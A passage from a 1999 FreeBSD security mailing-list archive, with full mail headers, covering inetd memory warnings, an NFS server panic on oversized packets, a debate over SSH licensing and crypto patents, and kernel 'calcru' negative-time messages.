from Jordan was that there was a subtle but in inetd (or triggered by inetd) which caused this sort of memory problem. I don't recall whether killing and restarting inetd was enough to "fix" it or if it required a reboot. I'm fairly certain that it didn't represent a security problem. --Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 9:18:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C06C114CA7 for ; Mon, 12 Apr 1999 09:18:43 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA15161; Mon, 12 Apr 1999 09:19:03 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda15159; Mon Apr 12 09:18:59 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id JAA00600; Mon, 12 Apr 1999 09:16:21 -0700 (PDT) Message-Id: <199904121616.JAA00600@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdekz590; Mon Apr 12 09:15:52 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.1-RELEASE X-Sender: cschuber To: Max Booth Cc: freebsd-security@FreeBSD.ORG Subject: Re: inetd problems In-reply-to: Your message of "Mon, 12 Apr 1999 16:17:47 BST." <37120E9B.1AE1FD8D@ukonline.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 12 Apr 1999 09:15:52 -0700 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37120E9B.1AE1FD8D@ukonline.net>, Max Booth writes: > Hi all, > > Reciently, since the load on one of our FreeBSD 3.0 systems has been > increasing I keep on getting the following errors when attempting > connections to the system: > > Escape character is '^]'. > inetd in realloc(): warning: junk pointer, too low to make sense. > inetd in free(): warning: junk pointer, too low to make sense. > Connection closed by foreign host. > > The only thing using inetd now is telnetd, so I can't emagine that it's > due to inetd being under too much preassure. > > Has anyone else experienced this problem? You're short of memory. Do a vmstat 5. If you see scan rates > 200-300 pages per second over a long period of time or scan rates > 5000 pages per second over a 20 second period of time, or if you experience pageout rates of >7-10 pages per second you need more RAM. See my comments from "Re: CRON in malloc(): warning: pointer to wrong page" Mon, 12 Apr 1999 06:54:00 for the long story. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 11:54:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 25057155CE; Mon, 12 Apr 1999 11:54:16 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id LAA16357; Mon, 12 Apr 1999 11:50:45 -0700 (PDT) Message-ID: <19990412115045.B8671@best.com> Date: Mon, 12 Apr 1999 11:50:45 -0700 From: "Jan B. Koum " To: Matthew Dillon , "David E. Cross" Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: increased crashing in NFS server Mail-Followup-To: Matthew Dillon , "David E. Cross" , freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <199904110341.XAA17071@cs.rpi.edu> <199904110703.AAA03493@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199904110703.AAA03493@apollo.backplane.com>; from Matthew Dillon on Sun, Apr 11, 1999 at 12:03:49AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Apr 11, 1999 at 12:03:49AM -0700, Matthew Dillon wrote: > :I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when > :contacting our servers (FreeBSD3 of the same build tree). We have > :noticed an increase in crashing of our main home directory server > :(which is the only server really handling RW mounts, our other servers > :are mostly RO, with some minor RW activity.) The first crash was > :obviously NFS. I traced it to one of 2 possible crash points in the > :kernel (sorry, no stack trace, we don't [yet] have a crashlogs enabled > :for that machine.). > : > :The panic was: > :mbuf siz=33476 > :panic: Bad nfs svc reply > > You are using a 32K file block size? If so, reduce it to 8K. > > I think you've just shown us a security hole in the NFS system -- it > panics if it is given too large a response packet. Oops. It should > just print a message and drop the packet. This is not a new bug Matt :( Take a look at kern/6771 PR (still open). -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 12:31:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 11A7A14E95 for ; Mon, 12 Apr 1999 12:31:06 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id NAA26808; Mon, 12 Apr 1999 13:28:42 -0600 (MDT) Message-Id: <4.2.0.32.19990412132649.043b7350@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 12 Apr 1999 13:28:39 -0600 To: Igor Roshchin From: Brett Glass Subject: Re: Interesting problem: chowning files sent via FTP Cc: security@FreeBSD.ORG In-Reply-To: <199904100752.CAA21374@alecto.physics.uiuc.edu> References: <4.2.0.32.19990409184654.045424d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As I understand it, SSH is encumbered by a license that requires you to pay big bucks unless you're an individual or a non-profit. I'd need to build the protocol into the specialized client software, too, which also isn't allowed by the license. If it were BSD-licensed, it wouldn't be a problem. --Brett At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote: >> Is this so? I was under the impression that the default group of a >> new file was the login group of the creator, as specified in /etc/passwd. > >The group by default is the group of the directory. >No sgid need to be set on the directory. >I've been using this in FreeBSD for a few years. >In System V (Irix) - it's different. > > > >Just an idea for the secure files transfer - "scp" (ssh) - >it allows to to transfer everything securely. >ssh can be used to delete the files. > >Igor > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 13:48:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (Postfix) with ESMTP id 51A7A14E89 for ; Mon, 12 Apr 1999 13:48:56 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu) Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id PAA01508; Mon, 12 Apr 1999 15:46:36 -0500 (CDT) From: Igor Roshchin Message-Id: <199904122046.PAA01508@alecto.physics.uiuc.edu> Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: <4.2.0.32.19990412132649.043b7350@localhost> from "Brett Glass" at "Apr 12, 1999 1:28:39 pm" To: brett@lariat.org (Brett Glass) Date: Mon, 12 Apr 1999 15:46:35 -0500 (CDT) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's the case for SSH v.2.x 1.x - is free for any use. check SSH's web site (http://www.ssh.fi/, I believe) Igor > As I understand it, SSH is encumbered by a license that requires > you to pay big bucks unless you're an individual or a non-profit. > I'd need to build the protocol into the specialized client > software, too, which also isn't allowed by the license. If it > were BSD-licensed, it wouldn't be a problem. > > --Brett > > At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote: > >> Is this so? I was under the impression that the default group of a > >> new file was the login group of the creator, as specified in /etc/passwd. > > > >The group by default is the group of the directory. > >No sgid need to be set on the directory. > >I've been using this in FreeBSD for a few years. > >In System V (Irix) - it's different. > > > > > > > >Just an idea for the secure files transfer - "scp" (ssh) - > >it allows to to transfer everything securely. > >ssh can be used to delete the files. > > > >Igor > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 13:50:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from ryouko.nas.nasa.gov (ryouko.nas.nasa.gov [129.99.34.113]) by hub.freebsd.org (Postfix) with ESMTP id 3823414E89 for ; Mon, 12 Apr 1999 13:50:23 -0700 (PDT) (envelope-from greg@ryouko.nas.nasa.gov) Received: from ryouko.nas.nasa.gov (localhost [127.0.0.1]) by ryouko.nas.nasa.gov (8.8.7/NAS8.8.7n) with ESMTP id NAA01335; Mon, 12 Apr 1999 13:47:45 -0700 (PDT) Message-Id: <199904122047.NAA01335@ryouko.nas.nasa.gov> To: Brett Glass Cc: Igor Roshchin , security@FreeBSD.ORG Subject: ssh protocol [was: Interesting problem: chowning files sent via FTP] In-reply-to: Your message of "Mon, 12 Apr 1999 13:28:39 MDT." <4.2.0.32.19990412132649.043b7350@localhost> Date: Mon, 12 Apr 1999 13:47:45 -0700 From: "Gregory P. Smith" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > As I understand it, SSH is encumbered by a license that requires > you to pay big bucks unless you're an individual or a non-profit. > I'd need to build the protocol into the specialized client > software, too, which also isn't allowed by the license. If it > were BSD-licensed, it wouldn't be a problem. The ssh PROTOCOL is free. In fact, the v2 protocol is making progress towards becoming an IETF standard. (v2 fixes some serious bugs in the v1 protocol). There is a free (GNU) ssh v2 protocol implementation in the works... Check out http://www.net.lut.ac.uk/psst/ (specifically, look at lsh) -Greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 14:30: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2EFDA14CEE for ; Mon, 12 Apr 1999 14:30:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id PAA28072; Mon, 12 Apr 1999 15:27:32 -0600 (MDT) Message-Id: <4.2.0.32.19990412152634.00ce0bb0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 12 Apr 1999 15:27:27 -0600 To: "Gregory P. Smith" From: Brett Glass Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Igor Roshchin , security@FreeBSD.ORG In-Reply-To: <199904122047.NAA01335@ryouko.nas.nasa.gov> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A GPLed implementation would be a bad idea, because it would prevent the code from being incorporated into commercial products and thus discourage standardization. This is one situation in which BSD-type licensing would be infinitely preferable. --Brett At 01:47 PM 4/12/99 -0700, Gregory P. Smith wrote: >> As I understand it, SSH is encumbered by a license that requires >> you to pay big bucks unless you're an individual or a non-profit. >> I'd need to build the protocol into the specialized client >> software, too, which also isn't allowed by the license. If it >> were BSD-licensed, it wouldn't be a problem. > >The ssh PROTOCOL is free. In fact, the v2 protocol is making progress >towards becoming an IETF standard. (v2 fixes some serious bugs in the >v1 protocol). There is a free (GNU) ssh v2 protocol implementation in >the works... Check out > >http://www.net.lut.ac.uk/psst/ > >(specifically, look at lsh) > >-Greg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 14:56:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.226]) by hub.freebsd.org (Postfix) with ESMTP id 1942614CF8 for ; Mon, 12 Apr 1999 14:56:05 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id QAA05528; Mon, 12 Apr 1999 16:56:26 -0400 (EDT) From: "Allen Smith" Message-Id: <9904121656.ZM5526@beatrice.rutgers.edu> Date: Mon, 12 Apr 1999 16:56:25 -0400 In-Reply-To: Brett Glass "Re: ssh protocol [was: Interesting problem: chowning files sent via FTP]" (Apr 12, 4:30pm) References: <4.2.0.32.19990412152634.00ce0bb0@localhost> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Brett Glass , "Gregory P. Smith" Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Igor Roshchin , security@FreeBSD.ORG Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Apr 12, 4:30pm, Brett Glass (possibly) wrote: > A GPLed implementation would be a bad idea, because it would prevent > the code from being incorporated into commercial products and thus > discourage standardization. This is one situation in which BSD-type > licensing would be infinitely preferable. Actually, what would be preferable is some form of GNU _library_ license. I'm not willing to trust an encryption program unless I know independent cryptographers have reviewed the code. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 15:13:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id E746614CF8 for ; Mon, 12 Apr 1999 15:13:22 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA28652; Mon, 12 Apr 1999 16:10:51 -0600 (MDT) Message-Id: <4.2.0.32.19990412160742.00c35dc0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Mon, 12 Apr 1999 16:10:46 -0600 To: "Allen Smith" , "Gregory P. Smith" From: Brett Glass Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] Cc: Igor Roshchin , security@FreeBSD.ORG In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu> References: <4.2.0.32.19990412152634.00ce0bb0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Berkeley licensing would also allow cryptographers to review the code, but would have the advantage that people could incorporate it not just as a library but as an integral part of a product. Also, Richard Stallman has pretty much decreed that the LGPL is history as far as FSF and "GNU" projects are concerned. They'll use the GPL on their libraries in an attempt to force companies to give up their work. This will backfire, of course, and we'll wind up with incompatible implementations. --Brett At 04:56 PM 4/12/99 -0400, Allen Smith wrote: >On Apr 12, 4:30pm, Brett Glass (possibly) wrote: >> A GPLed implementation would be a bad idea, because it would prevent >> the code from being incorporated into commercial products and thus >> discourage standardization. This is one situation in which BSD-type >> licensing would be infinitely preferable. > >Actually, what would be preferable is some form of GNU _library_ license. I'm >not willing to trust an encryption program unless I know independent >cryptographers have reviewed the code. > > -Allen > >-- >Allen Smith easmith@beatrice.rutgers.edu > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 16:49:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6B1D1155E6 for ; Mon, 12 Apr 1999 16:49:05 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id TAA22009; Mon, 12 Apr 1999 19:46:20 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 12 Apr 1999 19:46:19 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Igor Roshchin Cc: Brett Glass , security@freebsd.org Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: <199904122046.PAA01508@alecto.physics.uiuc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As usual, recall that there are patents on both RSA and IDEA; use may be restricted as a result, especially inclusion for the purposes of redistribution. The FreeBSD port is careful to download RSAREF to satisfy at least a few of the RSA clauses; I think 3DES is now the default not IDEA in the port but I'm not sure off hand. Fortunately, the RSA patent expires RSN (yay!). On Mon, 12 Apr 1999, Igor Roshchin wrote: > That's the case for SSH v.2.x > > 1.x - is free for any use. > > check SSH's web site > (http://www.ssh.fi/, I believe) > > Igor > > > > As I understand it, SSH is encumbered by a license that requires > > you to pay big bucks unless you're an individual or a non-profit. > > I'd need to build the protocol into the specialized client > > software, too, which also isn't allowed by the license. If it > > were BSD-licensed, it wouldn't be a problem. > > > > --Brett > > > > At 02:52 AM 4/10/99 -0500, Igor Roshchin wrote: > > >> Is this so? I was under the impression that the default group of a > > >> new file was the login group of the creator, as specified in /etc/passwd. > > > > > >The group by default is the group of the directory. > > >No sgid need to be set on the directory. > > >I've been using this in FreeBSD for a few years. > > >In System V (Irix) - it's different. > > > > > > > > > > > >Just an idea for the secure files transfer - "scp" (ssh) - > > >it allows to to transfer everything securely. > > >ssh can be used to delete the files. > > > > > >Igor > > > > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 17:10: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id A5FB9153FA for ; Mon, 12 Apr 1999 17:09:52 -0700 (PDT) (envelope-from matt@zigg.com) Received: from localhost (matt@localhost) by megaweapon.zigg.com (8.9.2/8.9.2) with ESMTP id UAA08397; Mon, 12 Apr 1999 20:08:13 -0400 (EDT) (envelope-from matt@zigg.com) Date: Mon, 12 Apr 1999 20:08:12 -0400 (EDT) From: Matt Behrens To: Allen Smith Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org While LGPL is certainly acceptable, code being put under the BSD license does not mean it hasn't been reviewed by independent folk. (Hmm, aren't we on a list that discusses some rather oft-reviewed BSD-licensed software?) :-) On Mon, 12 Apr 1999, Allen Smith wrote: : On Apr 12, 4:30pm, Brett Glass (possibly) wrote: : > A GPLed implementation would be a bad idea, because it would prevent : > the code from being incorporated into commercial products and thus : > discourage standardization. This is one situation in which BSD-type : > licensing would be infinitely preferable. : : Actually, what would be preferable is some form of GNU _library_ license. I'm : not willing to trust an encryption program unless I know independent : cryptographers have reviewed the code. Matt Behrens Owner/Administrator, zigg.com Chief Engineer, Nameless IRC Network To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 18:15: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 2F76D1565D for ; Mon, 12 Apr 1999 18:15:00 -0700 (PDT) (envelope-from nick@shibumi.feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id MAA30426; Tue, 13 Apr 1999 12:10:10 GMT (envelope-from nick@shibumi.feralmonkey.org) Date: Tue, 13 Apr 1999 12:10:09 +0000 (GMT) From: 0x1c To: Allen Smith Cc: Brett Glass , "Gregory P. Smith" , Igor Roshchin , security@FreeBSD.ORG Subject: Re: ssh protocol [was: Interesting problem: chowning files sent via FTP] In-Reply-To: <9904121656.ZM5526@beatrice.rutgers.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Apr 1999, Allen Smith wrote: > On Apr 12, 4:30pm, Brett Glass (possibly) wrote: > > A GPLed implementation would be a bad idea, because it would prevent > > the code from being incorporated into commercial products and thus > > discourage standardization. This is one situation in which BSD-type > > licensing would be infinitely preferable. > > Actually, what would be preferable is some form of GNU _library_ license. I'm > not willing to trust an encryption program unless I know independent > cryptographers have reviewed the code. How does the licence (gpl, lgpl, or bsd) have anything to do with independent cryptographers reviewing the code? The only crucial requirement is that the relevant source be available for analysis. Nick -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 2:56:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 6D5D014D5D for ; Tue, 13 Apr 1999 02:56:14 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id LAA22628; Tue, 13 Apr 1999 11:53:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id LAA10931; Tue, 13 Apr 1999 11:53:50 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Jared Mauch Cc: "Serguei V. Melekhov" , "freebsd-security@FreeBSD.ORG" Subject: Re: /Kernel Calcru In-reply-to: Your message of "Thu, 08 Apr 1999 13:24:50 EDT." <19990408132450.J11653@puck.nether.net> Date: Tue, 13 Apr 1999 11:53:50 +0200 Message-ID: <10929.923997230@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please look in the FAQ. Poul-Henning In message <19990408132450.J11653@puck.nether.net>, Jared Mauch writes: > It's a calculation of cpu time the process has used. > > Somewhere there was a math error, causing a negative time >to appear. > > I get thousands of these on some of my servers: > >eg: >calcru: negative time of -12177441 usec for pid 1420 (cucipop) > > etc.. > > I've not seen it be of any harm, but it may be >somehow that i'm not aware of. > > >On Thu, Apr 08, 1999 at 04:20:01PM +0400, Serguei V. Melekhov wrote: >> Hello, >> Sorry for the dumb question. Just don't know what does that mean? >> Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec >> Anyway, Time plays no role here. Just this kernel calcru message?! >> >> Thanks in advance. > >-- >Jared Mauch | pgp key available via finger from jared@puck.nether.net >clue++; | http://puck.nether.net/~jared/ My statements are only mine. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 5:21:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id C694414BFA for ; Tue, 13 Apr 1999 05:21:30 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA23434; Tue, 13 Apr 1999 09:18:46 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199904131218.JAA23434@ns1.sminter.com.ar> Subject: Re: inetd problems In-Reply-To: <199904121616.JAA00600@passer.osg.gov.bc.ca> from Cy Schubert at "Apr 12, 99 09:15:52 am" To: Cy.Schubert@uumail.gov.bc.ca Date: Tue, 13 Apr 1999 09:18:46 -0300 (GMT) Cc: max@ukonline.net, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior, Cy Schubert escribió: [...] > See my comments from "Re: CRON in malloc(): warning: pointer to > wrong page" Mon, 12 Apr 1999 06:54:00 for the long story. I can't find it in the archives. Where did you post it? Regards. Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 5:30:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id ED74F14C93 for ; Tue, 13 Apr 1999 05:30:16 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id FAA18238; Tue, 13 Apr 1999 05:30:39 -0700 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda18236; Tue Apr 13 05:30:37 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id FAA05312; Tue, 13 Apr 1999 05:27:49 -0700 (PDT) Message-Id: <199904131227.FAA05312@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdUP5308; Tue Apr 13 05:27:44 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: Fernando Schapachnik Cc: Cy.Schubert@uumail.gov.bc.ca, max@ukonline.net, freebsd-security@FreeBSD.ORG Subject: Re: inetd problems In-reply-to: Your message of "Tue, 13 Apr 1999 09:18:46 -0300." <199904131218.JAA23434@ns1.sminter.com.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Date: Tue, 13 Apr 1999 05:27:43 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199904131218.JAA23434@ns1.sminter.com.ar>, Fernando = Schapachnik wri tes: > En un mensaje anterior, Cy Schubert escribi=F3: > [...] > > See my comments from "Re: CRON in malloc(): warning: pointer to = > > wrong page" Mon, 12 Apr 1999 06:54:00 for the long story. > = > I can't find it in the archives. Where did you post it? Silly me, looking at the subject line I thought this discussion was on = stable -- didn't even bother to look at the cc list. Well that's where = the discussion was and where my comment was made. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=3D0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 13 6:16:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 020FA14C19 for ; Tue, 13 Apr 1999 06:16:28 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 2.12 #1) id 10X30V-000Aa4-00; Tue, 13 Apr 1999 15:13:39 +0200 From: Sheldon Hearn To: Igor Roshchin Cc: brett@lariat.org (Brett Glass), security@freebsd.org Subject: Re: Interesting problem: chowning files sent via FTP In-reply-to: Your message of "Mon, 